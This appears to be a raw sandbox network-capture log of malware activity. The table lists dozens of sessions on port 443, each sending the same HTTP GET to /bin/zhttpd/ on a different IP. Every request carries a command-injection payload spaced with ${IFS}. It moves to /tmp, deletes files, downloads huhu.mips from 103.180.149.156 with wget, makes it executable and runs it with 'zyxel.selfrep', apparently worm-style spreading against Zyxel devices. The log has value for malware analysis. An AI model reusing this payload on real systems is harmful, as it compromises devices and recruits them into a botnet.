                                                      Feb 2, 2024 06:35:57.725827932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5467192.168.2.144960461.16.108.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.725878954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5468192.168.2.1434162211.13.37.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.725928068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5469192.168.2.1438634168.213.125.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.725975037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5470192.168.2.1443902165.200.33.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726000071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5471192.168.2.1456966223.26.174.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726053953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5472192.168.2.1440130162.167.158.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726094961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5473192.168.2.144820291.139.186.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726131916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5474192.168.2.144039853.13.1.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726161003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5475192.168.2.145268646.106.238.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726197004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5476192.168.2.1452424191.249.245.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726250887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5477192.168.2.145797068.145.99.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726281881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5478192.168.2.145583424.231.87.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726336956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5479192.168.2.144499049.54.107.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726367950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5480192.168.2.1448574143.222.45.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726418972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5481192.168.2.1434798181.31.190.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726469040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5482192.168.2.1434538167.218.26.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726495981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5483192.168.2.1460214178.34.216.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726537943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5484192.168.2.1452752149.5.122.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726577997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5485192.168.2.1433486118.139.150.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726634026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5486192.168.2.144168475.242.226.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726687908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5487192.168.2.1457216125.66.229.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726717949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5488192.168.2.1442548201.194.176.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726777077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5489192.168.2.145649060.82.138.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726807117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5490192.168.2.1436936147.195.136.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726849079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5491192.168.2.1447690192.152.107.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726892948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5492192.168.2.1460124189.53.218.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726921082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5493192.168.2.143677873.174.79.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726963997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5494192.168.2.1458904134.147.172.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.726995945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5495192.168.2.143956682.97.149.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.727047920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5496192.168.2.145967471.88.126.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.727073908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5497192.168.2.1456426154.154.241.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.727108955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5498192.168.2.145951075.202.119.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.727169037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5499192.168.2.1448696213.5.222.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.727212906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5500192.168.2.1436670170.115.24.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.727245092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5501192.168.2.1458104116.84.106.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.727289915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5502192.168.2.1445484149.81.193.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.727327108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5503192.168.2.143734024.147.114.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.727372885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5504192.168.2.1435820217.254.105.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.727391958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5505192.168.2.143418877.254.134.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.727447987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5506192.168.2.14509608.182.11.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.727473021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5507192.168.2.1438370152.186.236.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.727494955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5508192.168.2.1434170167.66.18.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.727535009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5509192.168.2.1439510159.160.89.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.727602005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5510192.168.2.1458838194.84.149.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.727652073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5511192.168.2.144559679.20.197.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.727670908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5512192.168.2.1447254174.42.156.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.727705956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5513192.168.2.1455012152.227.52.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.727758884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5514192.168.2.144711049.127.95.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.727794886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5515192.168.2.145465617.219.241.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.727821112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5516192.168.2.1438546205.253.124.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.727874041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5517192.168.2.1439766184.114.38.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.727926970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5518192.168.2.143311480.236.105.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.727974892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5519192.168.2.1460636116.16.144.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.728018045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5520192.168.2.145451852.173.94.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.728061914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5521192.168.2.1451212100.236.29.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.728094101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5522192.168.2.144183869.90.121.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.728137970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5523192.168.2.1453326179.6.172.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.728167057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5524192.168.2.1449356209.0.14.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.728219032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5525192.168.2.1454894173.77.150.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.728254080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5526192.168.2.144845217.90.27.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.728298903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5527192.168.2.1445008190.160.241.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.728343010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5528192.168.2.1433960178.187.65.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.728375912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5529192.168.2.1459622110.203.255.67443
                                                      TimestampBytes transferredDirectionData
